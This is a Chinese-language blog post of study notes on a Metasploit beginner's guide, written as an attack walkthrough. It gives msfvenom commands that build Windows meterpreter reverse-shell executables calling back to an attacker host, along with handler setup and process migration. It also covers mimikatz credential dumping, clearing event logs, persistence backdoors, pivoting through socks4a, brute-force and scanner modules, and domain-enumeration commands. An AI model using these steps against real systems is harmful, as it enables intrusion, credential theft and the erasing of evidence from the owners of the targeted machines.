metasploit快速入门

　　今天没上班，在小黑屋里看了一个一百多页的书《metasploit新手指南》，在此将笔记分享给大家。欢迎大家批评指正，共同学习进步。

 

 

metasploit新手指南

笔记 kali

---

0x01 
metapoit基本文件结构如下：

config metasploit的环境配置信息，数据库配置信息 
data渗透后模块的一些工具及payload，第三方小工具集合，用户字典等数据信息 
Db rails编译生成msf的web框架的数据库信息 
Documentation 用户说明文档及开发文档 
External metasploit的一些基础扩展模块 
Libs metasploit的一些基础类和第三方模块类 
Log metasploit运行时的一些系统信息和其他信息 
Modules metasploit的系统工具模块，包括预辅助模块（auxiliary）,渗透模块(exploits)，攻击载荷（payloads）和后渗透模块（posts），以及空字段模块（nops）和编码模块（Encode rs） 
Msfinscan 对bin文件偏移地址扫描 
Msfconsole metasploit的基本命令行，集成了各种功能。 
Msfelfscan对linux的elf文件便移地址进行扫描 
。 
msfmachscan 功能同msfelfscan 
msfpescan 对windows的pe格式文件偏移地址进行扫描。 
msfvenom 集成了msfpayload和msfencode的功能，效率更高替代了msf payload和msfencode 
Plugins metasploit的第三方插件接口. 
scripts metasploit的常用后渗透模块，区别与data里的后渗透模块，不需要加post参数和绝对路径，可以直接运行。

---

0x02 
search 参数 
可以搜索到你metasploit存在利用模块 
use 参数： 
你想利用某个payload，或者某个模块都要用use参数。 
show options 参数 
他可以看到利用模块设置信息 
info 参数： 
他可以看到模块的所有的详细介绍信息 
set 参数： 
他是设置Basic targets选项，如set target 1 
set session 1 
back 参数： 
如果想重新选择一个新的利用模块就要用back返回。 
exit 参数： 
exit和back一样，一个是返回，一个是退出 
kill 参数： 
杀死一个进程。

---

0x03 
扫描阶段为了方便查看扫描的结果，那么就需要开启postgresql数据库。 
search portscanner 
use && 
show optionns 
run

---

0x04 
生成器msfvenom 
root@mvp:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.105.1 lPORT=8099 -f exe >shell.exe

0x05 
msfvenom编码生成 
https载荷突破防火墙的设置 
payload inject射入载荷（相当于把另一个payload添加进原有的会话id，从而返回一个新的绘画id） 
auto RDP Port 自动化开3389也可以开任意端口 
Inject in Memory 射入内存

---

0x06 
安卓payload生成

---

0x07 
cobaltstrike 
一款以metasploit为基础的GUI的框架式渗透工具。

---

0x08 
meterpreter命令分为： 
1、核心命令 
2、STDapi 文件指令 
3、STDapi 网络指令 
4、STDapi 用户接口指令 
5、STDapi web cam命令 
6、STDapi 文件系统命令 
7、Priv 提权命令 
8、priv 密码数据库命令 
9、Priv 时间戳命令 
攻击win7. 
1 
root@mvp:/var/www/html# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.105.1 LPORT=6745 -f exe >win.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
No Arch selected, selecting Arch: x86 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 502 bytes 
Final size of exe file: 73802 bytes 
2

msf > use multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_https 
payload => windows/meterpreter/reverse_https 
msf exploit(handler) > set LHOST 192.168.105.1 
set lport 6745 
sessions 
sessions -i 1

migrate命令 
迁移目标机的一个进程到另一个进程 
meterpreter > getpid 
Current pid: 3232 
meterpreter > run post/windows/manage/migrate

[] Running module against PC-20170804GGMB 
[] Current server process: win.exe (3232) 
[*] Spawning notepad.exe process to migrate to 
[+] Migrating to 3356 
[+] Successfully migrated to process 3356

脚本命令：rum_checkmv检查远程主机是虚拟机还是真正的主机。 
run getgui添加用户的命令 
run vnc看对方桌面 
run packetrecorder -i 0 查看目标系统的所有流量，并且进行数据包记录。 
load mimikatz 
clearev 清除事件日志

---

0x09 
一：获取meterpreter。 
1首先生成可执行文件 
root@mvp:~# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.105.1 LPORT=8934 -f exe > she.exe

 

1. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
2. No Arch selected, selecting Arch: x86 from the payload
3. No encoder or badchars specified, outputting raw payload
4. Payload size: 543 bytes
5. Final size of exe file: 73802 bytes```
7. msf > **use multi/handler**
8. msf exploit(handler) > **set payload windows/meterpreter/reverse_https**
9. payload => windows/meterpreter/reverse_https
10. msf exploit(handler) > **set LHOST 192.168.1.105**
11. LHOST => 192.168.1.105
12. msf exploit(handler) > **set LPORT 8934**
13. LPORT => 8934
14. msf exploit(handler) > **set SessionCommunicationTimeout 0**
15. SessionCommunicationTimeout => 0
16. msf exploit(handler) > **set exit0nsession false**
17. exit0nsession => false
18. msf exploit(handler) > **exploit -j**
20. ---
22. 二。Meterpreter基本隧道代理
23. portfwd是meterpreter提供的一种基本端口转发，portfwd可以反弹单个端口到本地，并且监听。
25. pivot是meterpreter的最常用的一种代理，可以轻松把你的机器代理到受害者内网环境下面介绍下pivot使用方法route add添加临时路由表。使用方法：route add添加临时路由表。
26. 在metasploit添加一个路由表，目的是访问10.1.1.129,将通过meterpreter的会话1来访问。
27. meterpreter>route
28. meterpreter>run get_local_subnets 查看路由段
29. 10.1.1.129 255.255.255.255 1 我们的路由标段是这个
30. Ms exploit(handler)>route add 10.1.1.129 255.255.255.255 1添加路由至本地
31. route print
33. ===============================
34. subnet netmask gateway
35. 10.1.1.129 255.255.255.255 session 1

这里如果要代理10.1.1.129/24到session 1,则可以这么写。 
到这里pivot已经配置好了，你在msf里对10.1.1.129进行扫描（db_nmap）或者访问（psexe模块，ssh模块）将通过代理session 1 这个回话来访问，如果想通过其他应用程序来使用这个代理怎么办呢，这时候可以借助metasploit socks4a提供一个i监听隧道供其他应用程序访问。

首先使用sockes4a并且配置，监听端口 
msf > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

Name Current Setting Required Description 
---- --------------- -------- ----------- 
SRVHOST 0.0.0.0 yes The address to listen on 
SRVPORT 1080 yes The port to listen on.

Auxiliary action:

Name Description 
---- ----------- 
Proxy

msf auxiliary(socks4a) > exploit -y 
[] Auxiliary module execution completed 
msf auxiliary(socks4a) > 
[] Starting the socks4a proxy server

查看监听端口： 
msf auxiliary(socks4a) > netstat -ano | grep "1080" 
[*] exec: netstat -ano | grep "1080"

tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)

端口已经监听，接着配置proxychains

0x10 
权限维护。metasploit后门并不怎么好用，建议拿到控制权限后利用外部第三方后门。 
一msf中自带后门。 
persistence 
metsvc 
scheduleme & schtasks

---

0x11 
信息搜集 
要想很好的搜集信息并为了有一个良好的查看结果，那么我们要做好以下启动msfconsole的三步：启动数据库；查看数据库；链接数据库。

端口扫描：search portscan 
目前两大扫描模式：syn/tcp

---

smb_version识别windows的版本 
use auxiliary/scanner/smb/smb_version

---

mssql_ping默认mssql会监听1433端口或者一个随机的tcp端口，如果监听的是随机端口，可以通过UDP在1433端口查询具体监听的是哪个端口。 
use auxiliary/scanner/mssql/mssql_ping

---

ssh_version识别ssh软件版本 
auxiliary/scanner/ssh/ssh_version

---

ftp_version寻找目标网络中ftp server

---

 

暴力破解

kali自带字典路径 
/usr/share/metasploit-framework/data/wordlists

auxiliary/scanner/mysql/mysql_login 
auxiliary/scanner/http/tomcat_mgr_login

假设tomcat帐号密码爆破成功，下面可以拿shell： 
exploit/multi/http/tomcat_mgr_deploy

---

metasploit常见探测服务模块：

 

**端口扫描**

auxiliary/scanner/portscan 
scanner/portscan/ack 
scanner/portscan/ftpbounce ftp跳端口扫描 
scanner/portscan/syn 
scanner/portscan/tcp 
scanner/portscan/xmss tcp"xmss"端口扫描

---

 

smb扫描

auxiliary/scanner/smb/smb_enumusers smb枚举 
auxiliary/scanner/smb/pipe_dcerpc_auditor 返回dcerpc信息 
auxiliary/scanner/smb/smb2 扫描smb2协议 
auxiliary/scanner/smb/smb_enumshares 扫描smb共享文件 
auxiliary/scanner/smb/smb_enumusers 枚举系统上的用户 
auxiliary/scanner/smb/smb_login smb登录 
use windows/smb/psexec smb登录 
auxiliary/scanner/smb/smb_lookupsid 扫描组的用户 
auxiliary/scanner/smb/smb_version 扫描系统版本

---

 

mssql扫描

admin/mssql/mssql_enum mssql枚举 
admin/mssql/mssql_exec mssql执行命令 
admin/mssql/mssql_sql mssql查询 
scanner/mssql/mssql_login mssql登录工具 
另外还有一个mssql_payload模块

---

 

smtp扫描

auxiliary/scanner/smtp/smtp_enum smtp枚举 
auxiliary/scanner/smtp/smtp_version 扫描smtp版本

---

 

snmp扫描

auxiliary/scanner/snmap/community 通过snmp扫描设备 
scanner/snmap/community snmp扫描

---

 

ssh扫描

auxiliary/scanner/ssh/ssh_login ssh登录 
auxiliary/scanner/ssh/ssh_login_pubkey ssh公共 密钥认证登录 
auxiliary/scanner/ssh/ssh_version 扫描ssh版本测试

---

 

telnet扫描

auxiliary/scanner/telnet/telnet_login telnet登录 
auxiliary/scanner/telnet/telnet_version telnet版本

---

 

tftp扫描

auxiliary/scanner/tftp/tftpbrute 扫描tftp的文件 
scanner/ftp/anonymous ftp版本扫描

---

 

arp扫描

auxiliary/scanner/discovery/arp_sweep 
auxiliary/scanner/discovery/udp_prode 扫描UDP服务主机 
auxiliary/scanner/discovery/udp_sweep 检测常用的udp服务 
auxiliary/sniffer/psnuffle sniffer密码

scanner/vnc/vnc_none_auth vnc服务无认证扫描模块

---

 

web服务器信息扫描模块

auxiliary/scanner/http下面的http_version,open_proxy,robots_txt,frontpage_login,tomcat_administration,tomcat_utf8_traversal,options,drupal_views_user_enum,scraper,svn_scanner,trace,vhost_scanner,webdav_internal_ip,webdav_scanner,webdav_website_content

---

 

文件目录扫描模块

auxiliary/scanner/http/下的backup_file,brute_dirs,copy_of_file,dir_listing,dir_scanner,dir_webdav_unicode_bypass,file_sanme_dir,files_dir,http_put,ms09_020_webdav_unicode_bypass,prev_dir_same_name_file,replace_ext,soap_xml,trace_axd,verb__auth_bypass

auxiliary/scanner/dos/http/apache_range_dos

---

 

web应用程序扫描模块

auxiliary/scanner/http/blind_sql_query 
auxiliary/scanner/http/error_sql_injection 
auxiliary/scanner/http/http_tracersal 
auxiliary/scanner/http/rails_mass_assignment 
exploit/multi/http/lcms_php_exec

---

0x12 
反弹meterpreter 
尝试提权2012服务器 
尝试当前帐号bypass提权 
相关信息搜集 域信息搜集 
net user /domain 
net group "domain computer" /domain 
net group "domain admins" /domain 查看域管理员 
net localgroup administrators 
net view /domain 
信息分析获取一台服务器权限 
net user \ip\c内网渗透的工作：域信息搜集入侵 
mimikaz抓取明文 
查看抓取到的用户的详细信息net user xxx /domain

尝试使用域令牌假冒 
利用smb传递 
1使用当前获取到的两个用户权限，快速的进行扫描 
2smb_login扫描 
3端口转发进内网 
4meterpreter端口转发 
5msf的socks4a转发

+

 

 https://www.zybuluo.com/jasun/note/841229

好了，我要吃饭了，饿坏了，。